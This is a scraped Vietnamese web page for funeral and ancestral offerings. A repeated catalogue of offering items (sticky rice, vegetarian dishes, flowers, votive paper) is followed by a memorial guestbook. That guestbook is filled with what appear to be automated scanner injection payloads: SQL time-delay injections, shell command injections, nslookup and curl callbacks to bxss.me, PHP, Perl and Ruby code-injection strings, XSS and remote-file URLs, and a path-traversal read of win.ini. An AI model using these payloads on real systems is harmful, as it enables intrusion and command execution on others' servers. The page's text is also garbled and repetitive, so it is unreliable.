anh-do-cung
Củ quả xào mề chay
anh-do-cung
Gạo
anh-do-cung
Xôi chè
anh-do-cung
Oản to
anh-do-cung
Oản
anh-do-cung
Muối
anh-do-cung
Mâm xôi (5kg gạo)
anh-do-cung
Xôi đĩa nhỡ (1kg gạo)
anh-do-cung
Xôi đĩa nhỏ
anh-do-cung
Cơm trắng
anh-do-cung
Chè
anh-do-cung
Bỏng nhỏ
anh-do-cung
Lavie chai lớn
anh-do-cung
Lavie chai nhỏ
anh-do-cung
Trầu cau
anh-do-cung
Mâm trái cây lớn
anh-do-cung
Mâm trái cây nhỡ
anh-do-cung
Đĩa trái cây nhỏ
anh-do-cung
Vàng mã
anh-do-cung
Nến đôi
anh-do-cung
Đồ dùng cá nhân
anh-do-cung
Ngựa thần linh
anh-do-cung
Mũ, nhà, xe
anh-do-cung
Thuốc lá
anh-do-cung
Xe
anh-do-cung
Vịt chay
anh-do-cung
Rau củ chay
anh-do-cung
Nộm chay
anh-do-cung
Nem chay
anh-do-cung
Giò chay
anh-do-cung
Gà chay
anh-do-cung
Trứng
anh-do-cung
Tôm chiên
anh-do-cung
Thịt luộc
anh-do-cung
Rau ngũ sắc
anh-do-cung
Nem quấn
anh-do-cung
Mực chiên
anh-do-cung
Lợn quay
anh-do-cung
Giò chả
anh-do-cung
Gà quay
anh-do-cung
Gà luộc
anh-do-cung
Canh thập cẩm
anh-do-cung
Bóng xào thập cẩm
anh-do-cung
Bánh chưng
anh-do-cung
Hoa sen
anh-do-cung
Hoa ly 5 tai
anh-do-cung
Hoa ly 3 tai
anh-do-cung
Hoa huệ
anh-do-cung
Hoa hồng
anh-do-cung
Hoa cúc
anh-do-cung
Trứng
anh-do-cung
Tôm chiên
anh-do-cung
Thịt luộc
anh-do-cung
Rau ngũ sắc
anh-do-cung
Nem quấn
anh-do-cung
Mực chiên
anh-do-cung
Lợn quay
anh-do-cung
Giò chả
anh-do-cung
Gà quay
anh-do-cung
Gà luộc
anh-do-cung
Canh thập cẩm
anh-do-cung
Bóng xào thập cẩm
anh-do-cung
Bánh chưng
anh-do-cung
Củ quả xào mề chay
anh-do-cung
Vịt chay
anh-do-cung
Rau củ chay
anh-do-cung
Nộm chay
anh-do-cung
Nem chay
anh-do-cung
Giò chay
anh-do-cung
Gà chay
anh-do-cung
Trầu cau
anh-do-cung
Mâm trái cây lớn
anh-do-cung
Mâm trái cây nhỡ
anh-do-cung
Đĩa trái cây nhỏ
anh-do-cung
Vàng mã
anh-do-cung
Nến đôi
anh-do-cung
Đồ dùng cá nhân
anh-do-cung
Ngựa thần linh
anh-do-cung
Mũ, nhà, xe
anh-do-cung
Thuốc lá
anh-do-cung
Xe
anh-do-cung
Gạo
anh-do-cung
Xôi chè
anh-do-cung
Oản to
anh-do-cung
Oản
anh-do-cung
Muối
anh-do-cung
Mâm xôi (5kg gạo)
anh-do-cung
Xôi đĩa nhỡ (1kg gạo)
anh-do-cung
Xôi đĩa nhỏ
anh-do-cung
Cơm trắng
anh-do-cung
Chè
anh-do-cung
Bỏng nhỏ
anh-do-cung
Lavie chai lớn
anh-do-cung
Lavie chai nhỏ

Góc tưởng niệm

Danh sách lời nhắn

1

1

1

1

1

555

1

555

1

555

1-1; waitfor delay '0:0:15' --

555

1-1); waitfor delay '0:0:15' --

555

response.write(9602814*9486019)

555

echo zhbepo$()\ mszgcw\nz^xyu||a #' &echo zhbepo$()\ mszgcw\nz^xyu||a #|" &echo zhbepo$()\ mszgcw\nz^xyu||a #

555

1dNlig63S'; waitfor delay '0:0:15' --

555

&echo hdlkfn$()\ wgivgk\nz^xyu||a #' &echo hdlkfn$()\ wgivgk\nz^xyu||a #|" &echo hdlkfn$()\ wgivgk\nz^xyu||a #

555

1

response.write(9358990*9647497)

Vz9LBc1k

555

1&echo mzsbfd$()\ wrdeka\nz^xyu||a #' &echo mzsbfd$()\ wrdeka\nz^xyu||a #|" &echo mzsbfd$()\ wrdeka\nz^xyu||a #

555

555

1

UMs0TK6P

|echo serrab$()\ zsriui\nz^xyu||a #' |echo serrab$()\ zsriui\nz^xyu||a #|" |echo serrab$()\ zsriui\nz^xyu||a #

555

1

555

1'"

555

1

555

1|echo xsfovb$()\ tqcljr\nz^xyu||a #' |echo xsfovb$()\ tqcljr\nz^xyu||a #|" |echo xsfovb$()\ tqcljr\nz^xyu||a #

555

Array

555

../1

555

1

555

(nslookup -q=cname hitwfnzxogbvp41602.bxss.me||curl hitwfnzxogbvp41602.bxss.me))

555

1

@@Q6Scy

555

${9999742+9999346}

555

$(nslookup -q=cname hitlvsubwwyld659cf.bxss.me||curl hitlvsubwwyld659cf.bxss.me)

555

1

555

1

${9999752+10000215}

&nslookup -q=cname hitvaomqdaurnf9812.bxss.me&'\"`0&nslookup -q=cname hitvaomqdaurnf9812.bxss.me&`'

555

1

../555

1

555

1

555

1

Array

&(nslookup -q=cname hitlcgjslxwds17503.bxss.me||curl hitlcgjslxwds17503.bxss.me)&'\"`0&(nslookup -q=cname hitlcgjslxwds17503.bxss.me||curl hitlcgjslxwds17503.bxss.me)&`'

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555

1&n953957=v919974

555

|(nslookup -q=cname hitefidsswevcbe05f.bxss.me||curl hitefidsswevcbe05f.bxss.me)

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555

)

555

`(nslookup -q=cname hitkjpavgrvoe3807e.bxss.me||curl hitkjpavgrvoe3807e.bxss.me)`

555

Http://bxss.me/t/fit.txt

555

!(()&&!|*|*|

555

1

555&n995928=v909082

;(nslookup -q=cname hitppeugmschj0080c.bxss.me||curl hitppeugmschj0080c.bxss.me)|(nslookup -q=cname hitppeugmschj0080c.bxss.me||curl hitppeugmschj0080c.bxss.me)&(nslookup -q=cname hitppeugmschj0080c.bxss.me||curl hitppeugmschj0080c.bxss.me)

555

http://bxss.me/t/fit.txt?.jpg

555

^(#$!@#$)(()))******

555

1

echo hdhifo$()\ bmxdyb\nz^xyu||a #' &echo hdhifo$()\ bmxdyb\nz^xyu||a #|" &echo hdhifo$()\ bmxdyb\nz^xyu||a #

1

555-1; waitfor delay '0:0:15' --

1

)

c:/windows/win.ini

555

1

&echo tgceao$()\ fecybx\nz^xyu||a #' &echo tgceao$()\ fecybx\nz^xyu||a #|" &echo tgceao$()\ fecybx\nz^xyu||a #

Array

555

1

555-1); waitfor delay '0:0:15' --

1

!(()&&!|*|*|

'.gethostbyname(lc('hitbf'.'iqqdicazf5213.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(71).chr(98).chr(68).'

555

1

555&echo ieerno$()\ lhrrtg\nz^xyu||a #' &echo ieerno$()\ lhrrtg\nz^xyu||a #|" &echo ieerno$()\ lhrrtg\nz^xyu||a #

bxss.me

555

1

555

1

5551WWy3PP8'; waitfor delay '0:0:15' --

1

^(#$!@#$)(()))******

".gethostbyname(lc("hitdv"."unheyxvm69204.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(68).chr(113).chr(66)."

555

1

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

Array

555

1

|echo hwbzfl$()\ zpwryq\nz^xyu||a #' |echo hwbzfl$()\ zpwryq\nz^xyu||a #|" |echo hwbzfl$()\ zpwryq\nz^xyu||a #

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

bxss.me/t/xss.html?%00

555

1

'.gethostbyname(lc('hitvs'.'znqywlvf9e86f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(86).chr(105).chr(74).'

1

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

Array

555

1

555|echo gmmddw$()\ huejmn\nz^xyu||a #' |echo gmmddw$()\ huejmn\nz^xyu||a #|" |echo gmmddw$()\ huejmn\nz^xyu||a #

1

555'"

1

bxss.me/t/xss.html?%00

';print(md5(31337));$a='

555

1

Http://bxss.me/t/fit.txt

'"()

555

1

".gethostbyname(lc("hitbv"."cdjbecys3394e.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(81).chr(115).chr(71)."

1

http://bxss.me/t/fit.txt?.jpg

1

(nslookup -q=cname hitolnnnpngrt318cf.bxss.me||curl hitolnnnpngrt318cf.bxss.me))

"+"A".concat(70-3).concat(22*4).concat(108).concat(67).concat(105).concat(72)+(require"socket" Socket.gethostbyname("hitzo"+"hfixfrhx203fb.bxss.me.")[3].to_s)+"

555

";print(md5(31337));$a="

555

index.php

555

1

Array

1

$(nslookup -q=cname hitqijdpkueaoa2828.bxss.me||curl hitqijdpkueaoa2828.bxss.me)

1

c:/windows/win.ini

'+'A'.concat(70-3).concat(22*4).concat(118).concat(84).concat(117).concat(68)+(require'socket' Socket.gethostbyname('hittu'+'bvhujjzjbdf59.bxss.me.')[3].to_s)+'

555

1

@@3vSeq

${@print(md5(31337))}

555

1

555

1

&nslookup -q=cname hitumxkrmekfx44ecf.bxss.me&'\"`0&nslookup -q=cname hitumxkrmekfx44ecf.bxss.me&`'

index.php

555

1

"+"A".concat(70-3).concat(22*4).concat(101).concat(79).concat(119).concat(84)+(require"socket" Socket.gethostbyname("hitfn"+"habmerwle9912.bxss.me.")[3].to_s)+"

1

bxss.me

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

${@print(md5(31337))}\

555

1

Array

index.php/.

555

1

&(nslookup -q=cname hiteoqbxdqwmjbe4e2.bxss.me||curl hiteoqbxdqwmjbe4e2.bxss.me)&'\"`0&(nslookup -q=cname hiteoqbxdqwmjbe4e2.bxss.me||curl hiteoqbxdqwmjbe4e2.bxss.me)&`'

xfs.bxss.me

555

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'.print(md5(31337)).'

555

1

Array

1

'+'A'.concat(70-3).concat(22*4).concat(113).concat(76).concat(101).concat(78)+(require'socket' Socket.gethostbyname('hitjt'+'rrrpkshae2105.bxss.me.')[3].to_s)+'

1

|(nslookup -q=cname hitvmtyxktbzs2e558.bxss.me||curl hitvmtyxktbzs2e558.bxss.me)

1

xfs.bxss.me

1

index.php

1

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1

'"()

1'"()&%

555

1

`(nslookup -q=cname hitlvqmogunjq11430.bxss.me||curl hitlvqmogunjq11430.bxss.me)`

'"

555

1

index.php

1

';print(md5(31337));$a='

1

;(nslookup -q=cname hituwhghgrloyd3294.bxss.me||curl hituwhghgrloyd3294.bxss.me)|(nslookup -q=cname hituwhghgrloyd3294.bxss.me||curl hituwhghgrloyd3294.bxss.me)&(nslookup -q=cname hituwhghgrloyd3294.bxss.me||curl hituwhghgrloyd3294.bxss.me)